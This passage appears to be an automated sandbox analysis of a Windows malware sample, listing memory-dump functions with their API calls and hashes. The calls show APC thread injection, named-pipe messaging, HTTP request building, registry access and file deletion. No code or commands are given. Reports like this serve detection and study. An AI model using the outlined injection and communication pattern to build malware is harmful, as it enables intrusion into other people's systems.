    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
